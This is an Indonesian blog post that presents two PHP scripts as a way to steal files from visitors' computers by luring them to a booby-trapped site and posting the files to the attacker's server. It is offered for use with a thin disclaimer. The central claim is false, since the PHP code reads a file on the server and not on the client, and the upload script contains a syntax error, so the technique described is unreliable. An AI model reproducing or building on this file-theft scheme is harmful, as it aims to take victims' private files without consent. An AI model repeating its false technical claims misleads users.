3:17 AM
Kajetz
Sebelum saya memperjelas isi dari pada judul ini, saya memohon agar apa yang dipraktekkan disini tidak menjadi suatu hal yang negatif buat orang lain. Kalaupun anda ingin mempraktekkannya dengan madsud jahat, segala sesuatunya bukan merupakan tanggung jawab saya.
Oke, kembali ke topik. Anda pasti tidak menduga, bila suatu ketika saya tahu apa rencana dibalik data yang Anda simpan pada komputer anda. Saya tidak perlu panggil dukun dan begadang seharian untuk menunggu bapak dukun menyelesaikan aksinya, he..he..he. Tahukah anda ?? dengan script PHP berikut ini, file-file yang ada di komputer client dapat diambil dengan mudah dan terselip di server Anda. Cukup dengan menipu korban untuk membuka situs yang sudah disisipi script ini, maka secara otomatis ia akan mengambil (upload) ke path server tujuan anda.
Berikut Scriptnya :
1. File Pertama
<?
// Script ini buat yang ngerti PHP
// Nama File : ScrCuri.php
// Fungsi : Pemproses pengiriman file ke server
$host='localhost';
$port=80;
// Ubah variabel path letak posisi upload.php
$path='/upload.php';
// Ganti variabel fileku dengan file yang ingin kamu ambil
$fileku = "c:\\\autoexec.bat";
$content_type = "text/plain"; // type mime file
// Start Header
srand((double)microtime()*1000000);
$boundary = "---------------------------".substr(md5(rand(0,32000)),0,10);
$data = "--$boundary";
$content_file = join("", file($fileku));
$data.="
Content-Disposition: form-data; name=\"fileku\"; filename=\"$fileku\"
Content-Type: $content_type
$content_file
--$boundary";
$data.="--\r\n\r\n";
$msg =
"POST $path HTTP/1.0
Content-Type: multipart/form-data; boundary=$boundary
Content-Length: ".strlen($data)."\r\n\r\n";
// End Header
$result="";
// Buka Koneksi
$f = fsockopen($host, $port);
fputs($f,$msg.$data);
// Dapatkan tanggapan + hasil
while (!feof($f))
{
$result .= fread($f,32000);
}
fclose($f);
// Cetak hasil
echo $result;
?>
2. File Kedua
<?
// Nama File : upload.php
// Fungsi : Penangkapan isi header atau request yang dikirim dan melakukan proses penyalinan file dari client
if (is_uploaded_file($fileku))
{
// Ubah variabel namasimpan sesuai path file penyimpanan yang kamu inginkan
$namasimpan="/backup_backup_backup/test/autoexec.bat"
copy($fileku, $namasimpan);
// Tampilkan hasil
echo "Oke";
}else{
echo "Gagal copy file >> '$fileku'.";
}
?>
Nah, setelah kamu menyimpan script kamu pada server/host kamu. Maka, untuk membuktikannya coba akses script scrcuri.php. Mis : http://bloganda.com/scrcuri.php , ingat!!! konfigurasi harus cocok lho... biar kamu gampang, simpan aja kedua file di root server kamu jadi, file upload.php diakses pada http://situskamu.com/upload.php. Udah ngerti??... Yap... aku harap begitu.. he..he..he. Untuk coba-coba akseslah script scrcuri.php pada lingkungan windows... apa yang terjadi??? Wowww... sebuah file autoexec.bat telah menyisip diserver kamu, alias diambil dari komputer client kamu sebagai percobaan.
Sebelum kamu merasa puas, perlu anda ketahui bahwa script diatas, belum sempurna (Makanya jangan puas dulu.... ). Mau tau kekurangannya ???.. Yeahhh... saya tau kamu juga tau iya khan???. Kita ketahui, pada file percobaan kita... hanya mampu mengambil file tertentu saja yang belum tentu ada dikomputer target. Misalkan aja file c:\tomero.gif , otomatis semua komputer belum tentu punya file kayak gitu. So, solusinya.. tambahkan aja javascript dan manipulasi dikit kedua script diatas... Tau khan.. k'lo ngga tau biarin aja buat PR dirumah atau bila perlu belajar PHP dulu yang buaaanyaaakk. Ngga bisa juga?? Jurus yang paling jitu adalah , Copy-Paste aja..." Dasar orang males...he..he..he..
Akhirnya, sekali lagi... segala sesuatu yang terdapat pada info ini, kegunaanya ada ditangan anda. Saya cuma menulis dan mengembangkan ide dengan madsud agar anda berhati-hati dengan dunia Internet walaupun terbilang asyikkk... Maafkan, jika ada kesalahan atau hal yang kurang berkenan dihati anda. Terima kasih.
skip to main |
skip to sidebar
Posted in: 
0 comments:
Post a Comment
Silahkan anda berkomentar, tapi jangan nyepam . . . .